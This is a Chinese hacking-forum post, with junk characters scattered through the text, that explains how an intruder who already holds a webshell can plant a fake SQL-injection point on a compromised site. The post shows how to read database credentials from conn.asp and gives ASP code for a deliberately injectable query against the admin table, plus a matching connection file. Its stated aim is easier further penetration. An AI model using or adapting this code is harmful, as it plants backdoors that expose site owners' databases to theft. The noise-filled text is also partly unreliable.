自己构造注入点方便入侵6 T6 a% C. ?' }7 v) K
/ R4 Q# r- ~% ]. p9 R
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息; p* z6 ~; U5 |* [: A+ @
# u% x5 j3 b- r/ i% l
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
. `# w0 ?! t C/ q' f2 @/ |# U- i. Z
$ h( b8 z8 J1 R' G5 X3 ^* ~首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
% s- g! ~2 C! B+ D8 b" L. d& @* @) Z. q
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表& p4 U: M5 B" e8 Q$ q J' C
. H+ ?1 ~( f/ T/ J" [% O+ }" R
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:$ m. D+ J7 `* ?
9 |: M4 s5 z" V/ [' c程序代码
: X( E0 |) u% W<!--#include file="xx.asp"-->" R: F& s+ M4 S$ d
<%0 |3 x, V; L: Y0 ^7 C* J
set rs=server.createobject("ADODB.recordset")
o/ x" l# o' |8 {id = request("id")/ f8 {3 _" X& p- h
strSQL = "select * from admin where id=" & id$ A1 _/ ^" q+ l% q; k0 r8 x, _
rs.open strSQL,conn,1,3
6 ^' S z3 o) X+ V Crs.close
! Y& w: I4 _+ N) L" p%>+ g" K; N$ j# J' T/ b, V& L
2 |4 Z, g5 b0 g! Q; c
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在* y& ~' ^ L3 W( t2 e' k' B
4 P, L* Y& A* \7 q+ @! [/ M G
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
9 q2 ~( N3 X. T2 U4 f% n' l0 }- j
) G. i1 m, q2 Z- }% V z, g1 Q然后就要构造一个连接数据库的文件了,代码如下:
* C- U; K, A" x) Y6 t7 u. i程序代码% D5 u+ @8 x( x5 s0 {/ d5 Z2 f
<%
0 o6 Y% Y& ?- [/ c( |strSQLServerName = "000.000.000.000" '服务器名称或地址: c' K( x$ k2 p7 I4 X0 a& i1 p5 q
strSQLDBUserName = "sqlname" '数据库帐号 C# i% K: n8 `2 n+ L
strSQLDBPassword = "sqlpass" '数据库密码7 @& H5 z2 P9 [# O6 v1 U1 a: Z
strSQLDBName = "sqldataname" '数据库名称% S# d( {0 a4 _' \
Set conn = Server.CreateObject("ADODB.Connection")9 G4 ]6 P4 x- {3 X* V# l* d* D6 u
strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
& U( w8 w* S( e0 aconn.open strCon. |; G. x* b/ [& x! n) p
%>
9 {/ \6 A O# O& X( F
& \" ]! F4 ^# U1 z0 q/ W) f, V2 r这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,7 D; r- X- B1 R y/ i) g
' T* G' F- U$ @, g: T, u' I! M
就这样,正常情况下,就OK了,伪造成功……9 ^# ]0 P, i0 p U4 I
3 R+ |9 X4 u7 t" K2 |
如果有什么问题可以提出来大家一起探讨解决。 |